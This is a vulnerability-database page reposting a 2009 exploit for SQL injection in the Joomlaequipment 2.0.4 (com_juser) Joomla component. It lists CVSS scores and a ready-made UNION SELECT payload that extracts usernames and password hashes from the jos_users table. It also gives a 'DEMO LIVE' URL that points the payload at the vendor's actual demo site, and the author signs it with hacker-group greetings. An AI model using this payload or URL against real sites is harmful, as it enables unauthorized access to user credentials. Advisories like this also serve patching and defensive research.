Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection

2009.07.28
Credit: Chip D3 Bi0s
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################### [+] Author : Chip D3 Bi0s [+] Author Name : Russell... [+] Email : chipdebios[alt+64]gmail.com [+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua [+] Group : LatinHackTeam [+] Vulnerability : SQL injection [+] Google Dork : imagine ;) [+] Email : chipdebios[alt+64]gmail.com ################################################### Example: http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code] ------ SQL code: +and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- ----- DEMO LIVE: http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ <creationDate>25.05.2007</creationDate> <author>Joomlaequipment</author> <copyright>Joomlaequipment"&#169;2007</copyright> <license>Comercial</license> <authorEmail>support@joomlaequipment.com</authorEmail> <authorUrl>http://joomlaequipment.com</authorUrl> <version>2.0.4</version> <description>Registration Manager</description>

References:

http://www.securityfocus.com/bid/35160
http://www.milw0rm.com/exploits/8847


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top